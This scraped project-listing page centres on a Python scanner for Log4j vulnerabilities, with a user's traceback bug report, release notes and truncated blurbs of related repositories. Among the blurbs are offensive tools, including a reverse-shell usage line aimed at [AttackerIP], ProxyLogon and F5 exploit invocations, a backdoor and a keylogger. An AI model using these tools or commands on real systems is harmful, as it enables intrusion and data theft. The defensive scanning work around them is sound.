Scanning for CVE-2021-44228, CVE-2021-45046, CVE-2019-17571
Requires a minimum of Python 2.7. Can be executed as Custom Script Rule of an Audit or via a Server Script with Server Automation. Also executable standalone from the command line if an Agent is present.
Reference
log4j-nullroute Quick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Ari
Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description This demo Tomcat 8 server has a vulnerable app deployed on it and is also vulne
log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script
log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk
log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be
Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re
Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At
We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them
Windows 11 python -m pip install pywin32 Python 3.10.1
Thanks, first, for offering this script.
Get the following error when running your script.
5 Sep 12, 2022
6 Dec 28, 2022
60 Dec 10, 2022
1 Dec 15, 2021
431 Dec 22, 2022
144 Nov 19, 2022
91 Dec 29, 2022
16 Mar 24, 2022
13 Jan 4, 2022
c:\dev\github\log4j_scanner>python scanner_win.py
Indicator for vulnerable component found in C:\$RECYCLE.BIN\S-1-5-21-67875770-1077041941-3688728843-1001\$RTYFQH1.jar: log4j 2.9.1-2.10.0
Unhandled exception processing C:\Program Files\Cryptomator\app\mods\javafx-graphics-17.0.1-win.jar
Traceback (most recent call last):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 88, in main
if handleJar(filename, filename):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 72, in handleJar
return handleJar(io.BytesIO(z.read(name)), filename.decode('utf-8')+":"+name)
AttributeError: 'str' object has no attribute 'decode'. Did you mean: 'encode'?
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 96, in <module>
sys.exit(main())
File "c:\dev\github\log4j_scanner\scanner_win.py", line 92, in main
traceback.print_exc()
NameError: name 'traceback' is not defined
Any idea why this is causing an issue.
bugAdded checksums for CVE-2021-44832
Source code(tar.gz)Python 3 compatible Use all but 2 CPUs for digest computations.
Source code(tar.gz)Some windows boxes throw an exception calling cpu_count()
Source code(tar.gz)Every project has to have an initial stable release
Source code(tar.gz)pybox A proof-of-concept bare-bones container written in 50 lines of python code. Provides namespace isolation and resource limit control Usage Insta
Lacework registry scanner Install & configure Lacework CLI Integrate a Container Registry Go to Lacework Resources Containers Container Image In
Vuln Impact This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management
A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance
Cam-Hacker Hack Cameras Mode Of Execution: apt-get install python3 apt-get insta
Python HDFS client Because the world needs yet another way to talk to HDFS from Python. Usage This library provides a Python client for WebHDFS. NameN
Log4Pot A honeypot for the Log4Shell vulnerability (CVE-2021-44228). License: GPLv3.0 Features Listen on various ports for Log4Shell exploitation. Det
ProxyLogon Pre-Auth SSRF To Arbitrary File Write For Education and Research Usage: C:\python proxylogon.py mail.evil.corp
0x00 介绍 tig Threat Intelligence Gathering 威胁情报收集,旨在提高蓝队拿到攻击 IP 后对其进行威胁情报信息收集的效率,目前已集成微步、IP 域名反查、Fofa 信息收集、ICP 备案查询、IP 存活检测五个模块,现已支持以下信息的查询: ✅ 微步标签 ✅ I
Home Assistant LDAP Auth Simple script to have LDAP authentication in Home Assistant Docker, using NGINX's ldap-auth container. Usage Deploy NGINX's l
adb - An exploitation tool for android devices. A tool that allows you to search for vulnerable android devices across the world and exploit them. Fea
F5-CVE-2022-1388-Exploit Exploit and Check Script for CVE 2022-1388 Usage Check against single host python3 CVE-2022-1388.py -v true -u target_url At
arp0_attacker An ARP Spoofer-attacker for Windows -OS to block away devices from your network. INFO Built in Python 3.8.2. arp0_attackerx.py is Upgrad
Confusing the ISP & Escaping the Supercookie
MayorSec Backdoor Fully functioning bind-type backdoor This backdoor is a fully functioning bind shell and lite version of my full functioning Gatekee
Privacy-respecting, hackable metasearch engine / pronunciation səːks. If you are looking for running instances, ready to use, then visit searx.space.
OSV - Open Source Vulnerabilities OSV is a vulnerability database and triage infrastructure for open source projects aimed at helping both open source
xkeysnail is yet another keyboard remapping tool for X environment written in Python. It's like xmodmap but allows more flexible remappings.
🖥 PortScan-DNS Esta é uma ferramenta simples de Port Scan + DNS by Hostname... 💻 | DNS Resolver / by Hostname: HOST IP EXTERNO IP INTERNO 💻 | Port
Discord-keylogger Usage python dlogger.py -t [Time interval in sec] if not speci
5 Jun 03, 2021
1 Dec 14, 2021
85 Dec 02, 2022
11 Nov 15, 2022
9 Dec 17, 2022
82 Dec 28, 2022
79 Dec 27, 2022
698 Dec 09, 2022
1 Sep 21, 2022
136 Jan 02, 2023
52 Dec 22, 2022
15 Mar 17, 2022
2 Nov 22, 2022
56 Mar 25, 2022
12.4k Jan 08, 2023
893 Jan 04, 2023
809 Dec 26, 2022
7 Dec 08, 2022
1 Jan 30, 2022